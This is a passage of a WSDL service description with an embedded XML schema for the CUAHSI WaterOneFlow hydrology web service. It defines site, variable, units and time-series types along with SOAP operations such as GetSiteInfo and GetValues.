<s:attribute name=\"ZoneAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"ZoneOffset\" type=\"s:string\"/>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"daylightSavingsTimeZone\" nillable=\"true\">
<s:complexType>
<s:attribute name=\"ZoneAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"ZoneOffset\" type=\"s:string\"/>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"geoLocation\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"geogLocation\" type=\"s1:GeogLocationType\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"localSiteXY\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"X\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"Y\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Z\" type=\"s:double\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
</s:sequence>
<s:attribute name=\"projectionInformation\" type=\"s:string\"/>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"elevation_m\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"verticalDatum\" type=\"s:string\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"extension\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"altname\"/>
</s:sequence>
<s:attribute name=\"oid\" type=\"s:normalizedString\"/>
<s:attribute name=\"metadataDateTime\" type=\"s:dateTime\"/>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"SourceInfoType\"/>
<s:complexType name=\"DataSetInfoType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:SourceInfoType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"dataSetIdentifier\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeZoneInfo\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"defaultTimeZone\" nillable=\"true\">
<s:complexType>
<s:attribute name=\"ZoneAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"ZoneOffset\" type=\"s:string\"/>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"daylightSavingsTimeZone\" nillable=\"true\">
<s:complexType>
<s:attribute name=\"ZoneAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"ZoneOffset\" type=\"s:string\"/>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"dataSetDescription\" type=\"s:string\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"dataSetLocation\" type=\"s1:GeogLocationType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"extension\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"GeogLocationType\">
<s:attribute default=\"EPSG:4326\" name=\"srs\" type=\"s:string\"/>
</s:complexType>
<s:complexType name=\"LatLonBoxType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:GeogLocationType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"south\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"west\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"north\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"east\" type=\"s:double\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"LatLonPointType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:GeogLocationType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"latitude\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"longitude\" type=\"s:double\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"seriesCatalogType\">
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"series\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"dataType\" type=\"s1:dataTypeEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s1:VariableInfoType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"valueCount\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:int\">
<s:attribute name=\"countIsEstimated\" type=\"s:boolean\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variableTimeInterval\" type=\"s1:TimePeriodType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"valueType\" type=\"s1:valueTypeEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"generalCategory\" type=\"s1:generalCategoryEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"sampleMedium\" type=\"s1:SampleMediumEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Method\" type=\"s1:MethodType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Source\" type=\"s1:SourceType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"QualityControlLevel\" nillable=\"true\" type=\"s1:QualityControlLevelType\"/>
</s:sequence>
</s:complexType>
</s:element>
</s:sequence>
<s:attribute name=\"menuGroupName\" type=\"s:string\"/>
<s:attribute name=\"serviceWsdl\" type=\"s:anyURI\"/>
</s:complexType>
<s:simpleType name=\"dataTypeEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Continuous\"/>
<s:enumeration value=\"Instantaneous\"/>
<s:enumeration value=\"Cumulative\"/>
<s:enumeration value=\"Incremental\"/>
<s:enumeration value=\"Average\"/>
<s:enumeration value=\"Maximum\"/>
<s:enumeration value=\"Minimum\"/>
<s:enumeration value=\"Constant Over Interval\"/>
<s:enumeration value=\"Categorical\"/>
<s:enumeration value=\"Best Easy Systematic Estimator \"/>
</s:restriction>
</s:simpleType>
<s:complexType name=\"VariableInfoType\">
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"variableCode\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:token\">
<s:attribute name=\"network\" type=\"s:string\"/>
<s:attribute name=\"vocabulary\" type=\"s:string\"/>
<s:attribute name=\"default\" type=\"s:boolean\"/>
<s:attribute name=\"variableID\" type=\"s:integer\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variableName\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variableDescription\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"valueType\" type=\"s1:valueTypeEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"dataType\" type=\"s1:dataTypeEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"generalCategory\" type=\"s1:generalCategoryEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"sampleMedium\" type=\"s1:SampleMediumEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"units\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"unitsAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"unitsCode\" type=\"s:token\"/>
<s:attribute name=\"unitsType\" type=\"s1:UnitsTypeEnum\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"options\" type=\"s1:ArrayOfOption\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"related\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"parentID\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"network\" type=\"s:string\"/>
<s:attribute name=\"vocabulary\" type=\"s:string\"/>
<s:attribute name=\"default\" type=\"s:boolean\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"relatedID\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"network\" type=\"s:string\"/>
<s:attribute name=\"vocabulary\" type=\"s:string\"/>
<s:attribute name=\"default\" type=\"s:boolean\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"extension\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"NoDataValue\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeSupport\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"unit\" type=\"s1:UnitsType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeInterval\" type=\"s:int\"/>
</s:sequence>
<s:attribute name=\"isRegular\" type=\"s:boolean\"/>
</s:complexType>
</s:element>
</s:sequence>
<s:attribute name=\"oid\" type=\"s:normalizedString\"/>
<s:attribute name=\"metadataDateTime\" type=\"s:dateTime\"/>
</s:complexType>
<s:simpleType name=\"valueTypeEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Field Observation\"/>
<s:enumeration value=\"Sample\"/>
<s:enumeration value=\"Model Simulation Result\"/>
<s:enumeration value=\"Derived Value\"/>
</s:restriction>
</s:simpleType>
<s:simpleType name=\"generalCategoryEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Water Quality\"/>
<s:enumeration value=\"Climate\"/>
<s:enumeration value=\"Hydrology\"/>
<s:enumeration value=\"Geology\"/>
<s:enumeration value=\"Biota\"/>
</s:restriction>
</s:simpleType>
<s:simpleType name=\"SampleMediumEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Surface Water\"/>
<s:enumeration value=\"Ground Water\"/>
<s:enumeration value=\"Sediment\"/>
<s:enumeration value=\"Soil\"/>
<s:enumeration value=\"Air\"/>
<s:enumeration value=\"Tissue\"/>
<s:enumeration value=\"Precipitation\"/>
</s:restriction>
</s:simpleType>
<s:simpleType name=\"UnitsTypeEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Angle\"/>
<s:enumeration value=\"Area\"/>
<s:enumeration value=\"Dimensionless\"/>
<s:enumeration value=\"Energy\"/>
<s:enumeration value=\"Energy Flux\"/>
<s:enumeration value=\"Flow\"/>
<s:enumeration value=\"Force\"/>
<s:enumeration value=\"Frequency\"/>
<s:enumeration value=\"Length\"/>
<s:enumeration value=\"Light\"/>
<s:enumeration value=\"Mass\"/>
<s:enumeration value=\"Permeability\"/>
<s:enumeration value=\"Power\"/>
<s:enumeration value=\"Pressure/Stress\"/>
<s:enumeration value=\"Resolution\"/>
<s:enumeration value=\"Scale\"/>
<s:enumeration value=\"Temperature\"/>
<s:enumeration value=\"Time\"/>
<s:enumeration value=\"Velocity\"/>
<s:enumeration value=\"Volume\"/>
</s:restriction>
</s:simpleType>
<s:complexType name=\"ArrayOfOption\">
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"option\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"name\" type=\"s:normalizedString\"/>
<s:attribute name=\"optionID\" type=\"s:integer\"/>
<s:attribute name=\"optionCode\" type=\"s:token\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
<s:complexType name=\"UnitsType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"UnitName\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"UnitDescription\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"UnitType\" type=\"s1:UnitsTypeEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"UnitAbbreviation\" type=\"s:string\"/>
</s:sequence>
<s:attribute name=\"UnitID\" type=\"s:int\"/>
</s:complexType>
<s:complexType name=\"TimePeriodType\"/>
<s:complexType name=\"TimeSingleType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:TimePeriodType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"timeSingle\" type=\"s:dateTime\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"beginDateTime\" type=\"s:dateTime\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"endDateTime\" type=\"s:dateTime\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"TimePeriodRealTimeType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:TimePeriodType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"realTimeDataPeriod\" type=\"s:duration\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"beginDateTime\" type=\"s:dateTime\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"endDateTime\" type=\"s:dateTime\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"TimeIntervalType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:TimePeriodType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"beginDateTime\" type=\"s:dateTime\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"endDateTime\" type=\"s:dateTime\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"MethodType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"MethodDescription\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"MethodLink\" type=\"s:string\"/>
</s:sequence>
<s:attribute name=\"methodID\" type=\"s:int\"/>
</s:complexType>
<s:complexType name=\"SourceType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Organization\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"SourceDescription\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Metadata\" type=\"s1:MetaDataType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"ContactInformation\" type=\"s1:ContactInformationType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"SourceLink\" type=\"s:anyURI\"/>
</s:sequence>
<s:attribute name=\"sourceID\" type=\"s:int\"/>
</s:complexType>
<s:complexType name=\"MetaDataType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"TopicCategory\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Title\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Abstract\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"ProfileVersion\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"MetadataLink\" type=\"s:anyURI\"/>
</s:sequence>
</s:complexType>
<s:complexType name=\"ContactInformationType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"ContactName\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"TypeOfContact\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Phone\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Email\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Address\"/>
</s:sequence>
</s:complexType>
<s:complexType name=\"QualityControlLevelType\">
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"QualityControlLevelID\" type=\"s:int\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
<s:complexType name=\"VariablesResponseType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variables\" type=\"s1:ArrayOfVariableInfoType\"/>
</s:sequence>
</s:complexType>
<s:complexType name=\"ArrayOfVariableInfoType\">
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"variable\" type=\"s1:VariableInfoType\"/>
</s:sequence>
</s:complexType>
<s:element name=\"variablesResponse\" type=\"s1:VariablesResponseType\"/>
<s:complexType name=\"TimeSeriesResponseType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"queryInfo\" type=\"s1:QueryInfoType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeSeries\" type=\"s1:TimeSeriesType\"/>
</s:sequence>
</s:complexType>
<s:complexType name=\"TimeSeriesType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"sourceInfo\" type=\"s1:SourceInfoType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s1:VariableInfoType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"values\" type=\"s1:TsValuesSingleVariableType\"/>
</s:sequence>
<s:attribute name=\"name\" type=\"s:string\"/>
</s:complexType>
<s:complexType name=\"TsValuesSingleVariableType\">
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"value\" type=\"s1:ValueSingleVariable\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"qualifier\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"qualifierCode\" type=\"s:token\"/>
<s:attribute name=\"qualifierID\" type=\"s:integer\"/>
<s:attribute name=\"oid\" type=\"s:normalizedString\"/>
<s:attribute name=\"metadataDateTime\" type=\"s:dateTime\"/>
<s:attribute name=\"network\" type=\"s:string\"/>
<s:attribute name=\"vocabulary\" type=\"s:string\"/>
<s:attribute name=\"default\" type=\"s:boolean\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"qualityControlLevel\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"qualityControlLevelID\" type=\"s:normalizedString\"/>
</s:sequence>
<s:attribute name=\"qualityControlLevelCode\" type=\"s:string\"/>
<s:attribute name=\"oid\" type=\"s:normalizedString\"/>
<s:attribute name=\"metadataDateTime\" type=\"s:dateTime\"/>
<s:attribute name=\"network\" type=\"s:string\"/>
<s:attribute name=\"vocabulary\" type=\"s:string\"/>
<s:attribute name=\"default\" type=\"s:boolean\"/>
</s:complexType>
</s:element>
</s:sequence>
<s:attribute name=\"timeZoneShiftApplied\" type=\"s:boolean\"/>
<s:attribute name=\"unitsAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"unitsCode\" type=\"s:token\"/>
<s:attribute name=\"unitsType\" type=\"s1:UnitsTypeEnum\"/>
<s:attribute name=\"count\" type=\"s:nonNegativeInteger\"/>
<s:attribute default=\"false\" name=\"unitsAreConverted\" type=\"s:boolean\"/>
</s:complexType>
<s:complexType name=\"ValueSingleVariable\">
<s:simpleContent>
<s:extension base=\"s:decimal\">
<s:attribute name=\"qualifiers\" type=\"s:string\"/>
<s:attribute name=\"censorCode\" type=\"s1:CensorCodeEnum\"/>
<s:attribute name=\"dateTime\" type=\"s:dateTime\"/>
<s:attribute name=\"qualityControlLevel\" type=\"s1:QualityControlLevelEnum\"/>
<s:attribute name=\"methodID\" type=\"s:string\"/>
<s:attribute name=\"sourceID\" type=\"s:string\"/>
<s:attribute name=\"accuracyStdDev\" type=\"s:double\"/>
<s:attribute name=\"codedVocabulary\" type=\"s:boolean\"/>
<s:attribute name=\"codedVocabularyTerm\" type=\"s:string\"/>
<s:attribute name=\"sampleID\" type=\"s:string\"/>
<s:attribute name=\"offsetValue\" type=\"s:double\"/>
<s:attribute name=\"offsetUnitsAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"offsetDescription\" type=\"s:string\"/>
<s:attribute name=\"offsetUnitsCode\" type=\"s:normalizedString\"/>
<s:attribute name=\"oid\" type=\"s:normalizedString\"/>
<s:attribute name=\"metadataDateTime\" type=\"s:dateTime\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
<s:simpleType name=\"CensorCodeEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"lt\"/>
<s:enumeration value=\"gt\"/>
<s:enumeration value=\"nc\"/>
</s:restriction>
</s:simpleType>
<s:simpleType name=\"QualityControlLevelEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Raw data\"/>
<s:enumeration value=\"Quality controlled data\"/>
<s:enumeration value=\"Derived products\"/>
<s:enumeration value=\"Interpreted products\"/>
<s:enumeration value=\"Knowledge products\"/>
</s:restriction>
</s:simpleType>
<s:element name=\"timeSeriesResponse\" type=\"s1:TimeSeriesResponseType\"/>
</s:schema>
</wsdl:types>
<wsdl:message name=\"GetSitesXmlSoapIn\">
<wsdl:part element=\"tns:GetSitesXml\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSitesXmlSoapOut\">
<wsdl:part element=\"tns:GetSitesXmlResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSiteInfoSoapIn\">
<wsdl:part element=\"tns:GetSiteInfo\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSiteInfoSoapOut\">
<wsdl:part element=\"tns:GetSiteInfoResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetVariableInfoSoapIn\">
<wsdl:part element=\"tns:GetVariableInfo\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetVariableInfoSoapOut\">
<wsdl:part element=\"tns:GetVariableInfoResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSitesSoapIn\">
<wsdl:part element=\"tns:GetSites\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSitesSoapOut\">
<wsdl:part element=\"tns:GetSitesResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSiteInfoObjectSoapIn\">
<wsdl:part element=\"tns:GetSiteInfoObject\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSiteInfoObjectSoapOut\">
<wsdl:part element=\"tns:GetSiteInfoObjectResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetVariableInfoObjectSoapIn\">
<wsdl:part element=\"tns:GetVariableInfoObject\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetVariableInfoObjectSoapOut\">
<wsdl:part element=\"tns:GetVariableInfoObjectResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetValuesSoapIn\">
<wsdl:part element=\"tns:GetValues\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetValuesSoapOut\">
<wsdl:part element=\"tns:GetValuesResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetValuesObjectSoapIn\">
<wsdl:part element=\"tns:GetValuesObject\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetValuesObjectSoapOut\">
<wsdl:part element=\"tns:GetValuesObjectResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:portType name=\"WaterOneFlow\">
<wsdl:operation name=\"GetSitesXml\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given an array of site numbers, this method returns the site metadata for each one. Send the array of site codes in this format: 'NetworkName:SiteCode'</wsdl:documentation>
<wsdl:input message=\"tns:GetSitesXmlSoapIn\"/>
<wsdl:output message=\"tns:GetSitesXmlSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfo\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a site number, this method returns the site's metadata. Send the site code in this format: 'NetworkName:SiteCode'</wsdl:documentation>
<wsdl:input message=\"tns:GetSiteInfoSoapIn\"/>
<wsdl:output message=\"tns:GetSiteInfoSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfo\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a variable code, this method returns the variable's name. Pass in the variable in this format: 'NetworkName:Variable'</wsdl:documentation>
<wsdl:input message=\"tns:GetVariableInfoSoapIn\"/>
<wsdl:output message=\"tns:GetVariableInfoSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetSites\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given an array of site numbers, this method returns the site metadata for each one. Send the array of site codes in this format: 'NetworkName:SiteCode'</wsdl:documentation>
<wsdl:input message=\"tns:GetSitesSoapIn\"/>
<wsdl:output message=\"tns:GetSitesSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfoObject\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a site number, this method returns the site's metadata. Send the site code in this format: 'NetworkName:SiteCode'</wsdl:documentation>
<wsdl:input message=\"tns:GetSiteInfoObjectSoapIn\"/>
<wsdl:output message=\"tns:GetSiteInfoObjectSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfoObject\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a variable code, this method returns the variable's siteName. Pass in the variable in this format: 'NetworkName:Variable'</wsdl:documentation>
<wsdl:input message=\"tns:GetVariableInfoObjectSoapIn\"/>
<wsdl:output message=\"tns:GetVariableInfoObjectSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetValues\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a site number, a variable, a start date, and an end date, this method returns a time series. Pass in the sitecode and variable in this format: 'NetworkName:SiteCode' and 'NetworkName:Variable'</wsdl:documentation>
<wsdl:input message=\"tns:GetValuesSoapIn\"/>
<wsdl:output message=\"tns:GetValuesSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetValuesObject\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a site number, a variable, a start date, and an end date, this method returns a time series. Pass in the sitecode and variable in this format: 'NetworkName:SiteCode' and 'NetworkName:Variable'</wsdl:documentation>
<wsdl:input message=\"tns:GetValuesObjectSoapIn\"/>
<wsdl:output message=\"tns:GetValuesObjectSoapOut\"/>
</wsdl:operation>
</wsdl:portType>
<wsdl:binding name=\"WaterOneFlow\" type=\"tns:WaterOneFlow\">
<soap:binding transport=\"http://schemas.xmlsoap.org/soap/http\"/>
<wsdl:operation name=\"GetSitesXml\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSitesXml\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfo\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSiteInfo\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
